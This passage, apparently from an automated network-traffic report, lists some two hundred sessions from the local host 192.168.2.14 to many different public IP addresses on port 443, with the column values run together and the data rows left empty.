                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19525192.168.2.1445044198.217.110.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19526192.168.2.144177495.83.75.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19527192.168.2.145705088.26.7.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19528192.168.2.143727836.193.134.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19529192.168.2.1447746104.158.198.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19530192.168.2.145798012.99.194.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19531192.168.2.1453992211.66.63.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19532192.168.2.145662260.47.208.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19533192.168.2.1443450109.168.73.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19534192.168.2.1442508219.36.199.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19535192.168.2.1455600143.204.221.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19536192.168.2.1436574169.3.5.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19537192.168.2.144772419.10.87.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19538192.168.2.144399235.215.169.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19539192.168.2.1440182184.26.162.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19540192.168.2.145136481.8.252.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19541192.168.2.144401452.237.91.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19542192.168.2.1441352134.24.208.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19543192.168.2.145883831.217.208.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19544192.168.2.1459904178.155.180.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19545192.168.2.1444208197.8.83.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19546192.168.2.1447996103.30.77.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19547192.168.2.1458198136.127.153.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19548192.168.2.143848861.15.73.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19549192.168.2.1447254157.217.157.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19550192.168.2.1440950105.55.230.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19551192.168.2.1457170171.252.212.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19552192.168.2.143620838.205.89.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19553192.168.2.144606077.90.209.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19554192.168.2.1433456207.186.100.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19555192.168.2.1459718212.251.5.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19556192.168.2.143760494.65.10.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19557192.168.2.1439258187.74.211.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19558192.168.2.144258868.86.81.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19559192.168.2.143904094.168.202.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19560192.168.2.1457152211.51.241.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19561192.168.2.143296862.225.215.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19562192.168.2.144558699.91.174.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19563192.168.2.143898448.156.32.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19564192.168.2.1452510146.242.9.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19565192.168.2.1443182107.244.90.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19566192.168.2.1443134182.250.160.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19567192.168.2.143735674.219.98.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19568192.168.2.1454988201.156.125.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19569192.168.2.1447708160.40.54.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19570192.168.2.1452556205.206.34.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19571192.168.2.1434004103.1.229.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19572192.168.2.1458716142.2.16.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19573192.168.2.145805259.90.114.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19574192.168.2.144693495.93.23.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19575192.168.2.1438074156.191.116.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19576192.168.2.143580060.247.93.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19577192.168.2.1439568201.131.99.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19578192.168.2.145329442.176.198.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19579192.168.2.14498828.137.191.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19580192.168.2.1459442128.62.153.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19581192.168.2.1443134175.157.213.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19582192.168.2.143322845.194.162.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19583192.168.2.1451108198.2.92.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19584192.168.2.14608628.187.204.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19585192.168.2.144147087.225.255.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19586192.168.2.1457050118.98.141.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19587192.168.2.1454416125.65.136.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19588192.168.2.1457602135.191.189.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19589192.168.2.144941624.108.232.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19590192.168.2.1451676195.3.246.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19591192.168.2.1459044205.69.56.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19592192.168.2.144197078.114.120.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19593192.168.2.1456676115.187.116.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19594192.168.2.144018261.105.226.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19595192.168.2.145976890.41.106.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19596192.168.2.1440982172.66.30.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19597192.168.2.1455728112.153.184.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19598192.168.2.1453872105.174.162.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19599192.168.2.144667275.221.222.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19600192.168.2.1457552138.89.168.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19601192.168.2.145983662.154.7.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19602192.168.2.145676662.139.109.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19603192.168.2.1432942210.114.183.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19604192.168.2.143729823.12.123.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19605192.168.2.1437090117.180.12.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19606192.168.2.145804484.237.238.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19607192.168.2.1450258220.157.95.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19608192.168.2.1452760155.81.42.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19609192.168.2.143863867.194.108.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19610192.168.2.1458742118.68.147.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19611192.168.2.144364244.192.30.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19612192.168.2.1436124210.96.221.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19613192.168.2.1448410200.81.84.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19614192.168.2.1433656178.75.60.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19615192.168.2.145588268.138.95.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19616192.168.2.1443294203.100.140.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19617192.168.2.144507477.141.157.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19618192.168.2.1450770179.231.85.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19619192.168.2.1436998162.228.144.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19620192.168.2.1454016188.113.105.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19621192.168.2.1439162139.8.65.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19622192.168.2.143747631.199.2.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19623192.168.2.143824072.91.51.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19624192.168.2.1448062156.118.239.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19625192.168.2.143477095.87.101.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19626192.168.2.1458522197.129.243.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19627192.168.2.1443964120.73.51.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19628192.168.2.1445690105.227.251.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19629192.168.2.145787863.78.151.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19630192.168.2.1456452164.29.61.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19631192.168.2.1441756166.107.231.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19632192.168.2.143636232.230.25.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19633192.168.2.145380248.198.248.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19634192.168.2.1453500189.160.202.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19635192.168.2.144600450.205.252.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19636192.168.2.1443108134.91.125.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19637192.168.2.1440898154.19.193.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19638192.168.2.1433138143.141.163.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19639192.168.2.1446014152.39.248.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19640192.168.2.144337293.93.202.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19641192.168.2.1451308202.6.122.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19642192.168.2.144781281.24.7.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19643192.168.2.144931871.242.6.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19644192.168.2.1440878178.75.78.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19645192.168.2.1432880154.155.26.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19646192.168.2.144030090.105.16.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19647192.168.2.1455310171.55.172.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19648192.168.2.1452034167.138.241.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19649192.168.2.1438652176.40.16.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19650192.168.2.1457348208.90.228.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19651192.168.2.1436312162.236.82.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19652192.168.2.1432948101.91.101.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19653192.168.2.144898057.18.36.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19654192.168.2.1446256104.157.82.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19655192.168.2.144663860.192.129.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19656192.168.2.1449456148.233.33.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19657192.168.2.1454300185.43.238.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19658192.168.2.144030669.29.135.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19659192.168.2.1439920190.102.0.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19660192.168.2.145284093.80.241.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19661192.168.2.144343261.242.75.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19662192.168.2.1450934210.109.255.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19663192.168.2.1460862171.208.170.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19664192.168.2.144241293.64.141.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19665192.168.2.144665069.78.18.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19666192.168.2.1445822104.248.201.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19667192.168.2.144626232.16.93.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19668192.168.2.143345094.211.51.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19669192.168.2.1441312184.232.253.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19670192.168.2.1458390116.66.175.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19671192.168.2.145065619.84.107.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19672192.168.2.1435498183.153.200.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19673192.168.2.1437392152.198.203.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19674192.168.2.14464804.97.13.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19675192.168.2.1449946130.194.35.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19676192.168.2.1458444189.246.127.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19677192.168.2.1453986132.188.189.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19678192.168.2.1436218116.77.172.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19679192.168.2.1435108178.207.29.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19680192.168.2.144355470.130.113.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19681192.168.2.1447770216.176.81.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19682192.168.2.1460546112.196.179.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19683192.168.2.1460058213.223.109.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19684192.168.2.143976637.246.156.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19685192.168.2.145259695.101.125.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19686192.168.2.1456838220.205.168.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19687192.168.2.1446086143.106.32.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19688192.168.2.1438666178.145.46.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19689192.168.2.1445670176.235.13.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19690192.168.2.144617845.209.255.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19691192.168.2.1441144173.87.187.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19692192.168.2.14432724.58.67.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19693192.168.2.1446210193.6.152.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19694192.168.2.1437164210.107.249.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19695192.168.2.1454282189.225.208.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19696192.168.2.1439434132.196.129.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19697192.168.2.1448338220.238.168.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19698192.168.2.144491435.0.232.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19699192.168.2.144324034.31.1.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19700192.168.2.1434680181.65.196.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19701192.168.2.1457262116.140.245.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19702192.168.2.143893648.209.151.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19703192.168.2.144921848.57.234.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19704192.168.2.1443358133.164.186.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19705192.168.2.1443620132.245.103.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19706192.168.2.145007482.247.60.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19707192.168.2.1451926136.16.217.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19708192.168.2.1458186123.142.7.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19709192.168.2.145205286.107.216.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19710192.168.2.1434594160.112.222.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19711192.168.2.1459116157.6.207.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19712192.168.2.14606909.220.172.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19713192.168.2.1439682166.26.127.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19714192.168.2.144112294.46.162.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19715192.168.2.1451828148.109.11.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19716192.168.2.1449060140.182.234.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19717192.168.2.1438256109.178.130.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19718192.168.2.1434916217.246.34.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19719192.168.2.144546487.64.49.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19720192.168.2.1452882199.11.38.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19721192.168.2.143746661.116.210.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19722192.168.2.145699259.18.8.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19723192.168.2.144544219.141.114.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19724192.168.2.143398636.170.106.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19725192.168.2.1451696203.106.245.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19726192.168.2.1453768121.121.116.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19727192.168.2.1455490178.49.167.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19728192.168.2.1456050185.133.88.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19729192.168.2.1435300222.184.140.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19730192.168.2.1439672100.31.140.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19731192.168.2.144744636.134.134.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19732192.168.2.145565891.246.8.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19733192.168.2.145472290.122.195.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19734192.168.2.1453072145.12.36.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19735192.168.2.1449024130.77.109.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19736192.168.2.1450248156.19.238.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19737192.168.2.1456736165.161.83.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19738192.168.2.1458186118.106.214.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19739192.168.2.1453504146.41.42.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19740192.168.2.1455344112.103.93.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19741192.168.2.143383020.69.142.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19742192.168.2.145203649.194.109.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19743192.168.2.144852494.231.189.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19744192.168.2.145365492.31.26.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19745192.168.2.1444868149.242.209.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
